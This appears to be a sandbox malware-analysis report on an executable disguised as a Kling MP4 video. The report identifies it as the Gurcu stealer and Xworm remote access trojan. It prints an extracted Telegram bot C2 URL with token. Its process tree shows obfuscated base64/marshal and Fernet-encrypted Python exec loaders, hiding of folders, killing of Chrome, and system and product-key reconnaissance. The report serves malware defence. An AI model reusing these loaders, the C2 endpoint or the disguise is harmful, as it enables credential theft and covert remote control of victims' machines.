Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-10-2024 02:47

General

  • Target

    Kling_CompletedVideo.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe

  • Size

    53.5MB

  • MD5

    3d48cdbd6d323a25303ec7c6e6c31176

  • SHA1

    044a8d324faf96eaaca3a8323bcb1eb75ecca1d8

  • SHA256

    96ff951df16221de54c394c38869aa77e6e7424669521ce5aaabee379b6f96f1

  • SHA512

    b64d6714530d342c7f615261062f8e60a6d472651878de2748edef862f1811d32b919a0252013e1cd8cea45b68fa9aa6f5f6ccf39298a80efa8fdf0829522f61

  • SSDEEP

    786432:rnkl+yqXRVMeIrKNdd8T7lEwR0A9z2x4HdIooSaEOUcaLAC1tVCCxQTl8vUOwZgN:I+LXRVCe8TUqHdXoSB5ACt5xQ5wk

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7276041743:AAHcuQBIgMQxThnw-SMW4PSn0GYAkSjroxA/sendMessage?chat_id=-1002395802128

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses a powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempts to gather information on the host's network.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Kling_CompletedVideo.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe
    "C:\Users\Admin\AppData\Local\Temp\Kling_CompletedVideo.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3464
    • C:\Windows\system32\cmd.exe
      "cmd" /C start C:\Users\Admin\AppData\Roaming\completetedv.mp4
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3100
      • C:\Program Files\VideoLAN\VLC\vlc.exe
        "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\completetedv.mp4"
        3⤵
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:2024
    • C:\explorerwi\explorer.exe
      "C:\explorerwi\explorer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3752
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('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')));MXEL(__import__('marshal').loads(__import__('base64').b64decode('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')))
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\SysWOW64\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
            5⤵
            • System Location Discovery: System Language Discovery
            PID:916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4000
          • C:\Windows\SysWOW64\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4804
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4920
          • C:\Windows\SysWOW64\tasklist.exe
            TASKLIST /FI "STATUS eq RUNNING"
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2320
          • C:\Windows\SysWOW64\find.exe
            find /V "Image Name"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3404
          • C:\Windows\SysWOW64\find.exe
            find /V "="
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2312
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic csproduct get uuid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1152
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'uxyI_CawdzHc_-f0v31N6RdOhmPceWptkt9gJaHBwxU=').decrypt(b'...'))"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Network Service Discovery
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwin""
          4⤵
          • Hide Artifacts: Hidden Files and Directories
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s "C:/explorerwin"
            5⤵
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:4324
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'ViriKlkg22n1ztfawqmpxUymLAlW_I5_g41x7FLJOnE=').decrypt(b'...'))"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Network Service Discovery
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwi""
          4⤵
          • Hide Artifacts: Hidden Files and Directories
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3748
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s "C:/explorerwi"
            5⤵
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:3804
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'PFEb2Ao_jLL5_G5rAQ1I7A2BHguUlElphEwsGEaRwj4=').decrypt(b'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'))"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3568
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('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')));KYCL(__import__('marshal').loads(__import__('base64').b64decode('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')))
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "taskkill /f /im chrome.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3908
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im chrome.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4672
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4324
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic os get Caption
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1176
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5072
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1848
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4900
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:5084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1504
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            5⤵
            • System Location Discovery: System Language Discovery
            • Detects videocard installed
            PID:4976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4516
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2852
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('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')));XFSM(__import__('marshal').loads(__import__('base64').b64decode('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')))
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:2760

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pibpweew.kqg.ps1

    Filesize

    60B

  • C:\Users\Admin\AppData\Roaming\completetedv.mp4

    Filesize

    4.5MB

  • C:\explorerwi\explorer.exe

    Filesize

    48.1MB

  • C:\explorerwi\mewmew.dll

    Filesize

    48.8MB

  • C:\explorerwi\pdl.exe

    Filesize

    652KB

  • C:\explorerwin\Lib\__future__.py

    Filesize

    5KB

  • C:\explorerwin\Lib\__pycache__\__future__.cpython-311.pyc

    Filesize

    4KB

  • C:\explorerwin\Lib\__pycache__\base64.cpython-311.pyc

    Filesize

    27KB

  • C:\explorerwin\Lib\__pycache__\copyreg.cpython-311.pyc

    Filesize

    8KB

  • C:\explorerwin\Lib\__pycache__\enum.cpython-311.pyc

    Filesize

    83KB

  • C:\explorerwin\Lib\__pycache__\functools.cpython-311.pyc

    Filesize

    45KB

  • C:\explorerwin\Lib\__pycache__\keyword.cpython-311.pyc

    Filesize

    1KB

  • C:\explorerwin\Lib\__pycache__\operator.cpython-311.pyc

    Filesize

    18KB

  • C:\explorerwin\Lib\__pycache__\reprlib.cpython-311.pyc

    Filesize

    9KB

  • C:\explorerwin\Lib\__pycache__\struct.cpython-311.pyc

    Filesize

    430B

  • C:\explorerwin\Lib\__pycache__\types.cpython-311.pyc

    Filesize

    14KB

  • C:\explorerwin\Lib\__pycache__\warnings.cpython-311.pyc

    Filesize

    24KB

  • C:\explorerwin\Lib\base64.py

    Filesize

    21KB

  • C:\explorerwin\Lib\collections\__init__.py

    Filesize

    52KB

  • C:\explorerwin\Lib\collections\__pycache__\__init__.cpython-311.pyc

    Filesize

    76KB

  • C:\explorerwin\Lib\copyreg.py

    Filesize

    7KB

  • C:\explorerwin\Lib\encodings\__init__.py

    Filesize

    5KB

  • C:\explorerwin\Lib\encodings\__pycache__\__init__.cpython-311.pyc

    Filesize

    6KB

  • C:\explorerwin\Lib\encodings\__pycache__\aliases.cpython-311.pyc

    Filesize

    12KB

  • C:\explorerwin\Lib\encodings\__pycache__\cp1252.cpython-311.pyc

    Filesize

    3KB

  • C:\explorerwin\Lib\encodings\__pycache__\utf_8.cpython-311.pyc

    Filesize

    2KB

  • C:\explorerwin\Lib\encodings\aliases.py

    Filesize

    15KB

  • C:\explorerwin\Lib\encodings\cp1252.py

    Filesize

    13KB

  • C:\explorerwin\Lib\encodings\utf_8.py

    Filesize

    1KB

  • C:\explorerwin\Lib\enum.py

    Filesize

    77KB

  • C:\explorerwin\Lib\functools.py

    Filesize

    38KB

  • C:\explorerwin\Lib\keyword.py

    Filesize

    1KB

  • C:\explorerwin\Lib\logging\__init__.py

    Filesize

    81KB

  • C:\explorerwin\Lib\operator.py

    Filesize

    11KB

  • C:\explorerwin\Lib\re\__init__.py

    Filesize

    15KB

  • C:\explorerwin\Lib\re\__pycache__\__init__.cpython-311.pyc

    Filesize

    18KB

  • C:\explorerwin\Lib\re\__pycache__\_casefix.cpython-311.pyc

    Filesize

    1KB

  • C:\explorerwin\Lib\re\__pycache__\_compiler.cpython-311.pyc

    Filesize

    31KB

  • C:\explorerwin\Lib\re\__pycache__\_constants.cpython-311.pyc

    Filesize

    5KB

  • C:\explorerwin\Lib\re\__pycache__\_parser.cpython-311.pyc

    Filesize

    49KB

  • C:\explorerwin\Lib\re\_casefix.py

    Filesize

    5KB

  • C:\explorerwin\Lib\re\_compiler.py

    Filesize

    26KB

  • C:\explorerwin\Lib\re\_constants.py

    Filesize

    6KB

  • C:\explorerwin\Lib\re\_parser.py

    Filesize

    42KB

  • C:\explorerwin\Lib\reprlib.py

    Filesize

    5KB

  • C:\explorerwin\Lib\site-packages\_distutils_hack\__init__.py

    Filesize

    5KB

  • C:\explorerwin\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-311.pyc

    Filesize

    10KB

  • C:\explorerwin\Lib\site-packages\distutils-precedence.pth

    Filesize

    151B

  • C:\explorerwin\Lib\site-packages\idna-3.10.dist-info\INSTALLER

    Filesize

    4B

  • C:\explorerwin\Lib\site-packages\pyasn1\codec\native\__init__.py

    Filesize

    59B

  • C:\explorerwin\Lib\site-packages\pywin32.pth

    Filesize

    178B

  • C:\explorerwin\Lib\site-packages\requests\__init__.py

    Filesize

    4KB

  • C:\explorerwin\Lib\site-packages\requests\__pycache__\__init__.cpython-311.pyc

    Filesize

    6KB

  • C:\explorerwin\Lib\site-packages\urllib3\__init__.py

    Filesize

    6KB

  • C:\explorerwin\Lib\site-packages\urllib3\__pycache__\__init__.cpython-311.pyc

    Filesize

    7KB

  • C:\explorerwin\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-311.pyc

    Filesize

    1KB

  • C:\explorerwin\Lib\site-packages\win32\lib\pywin32_bootstrap.py

    Filesize

    1KB

  • C:\explorerwin\Lib\site-packages\win32comext\internet\__init__.py

    Filesize

    135B

  • C:\explorerwin\Lib\struct.py

    Filesize

    272B

  • C:\explorerwin\Lib\test\test_importlib\extension\__main__.py

    Filesize

    62B

  • C:\explorerwin\Lib\test\test_importlib\import_\__init__.py

    Filesize

    147B

  • C:\explorerwin\Lib\types.py

    Filesize

    10KB

  • C:\explorerwin\Lib\warnings.py

    Filesize

    21KB

  • C:\explorerwin\VCRUNTIME140.dll

    Filesize

    78KB

  • C:\explorerwin\mewobfm.dll

    Filesize

    47.9MB

  • C:\explorerwin\python.exe

    Filesize

    97KB

  • C:\explorerwin\python311.dll

    Filesize

    4.7MB
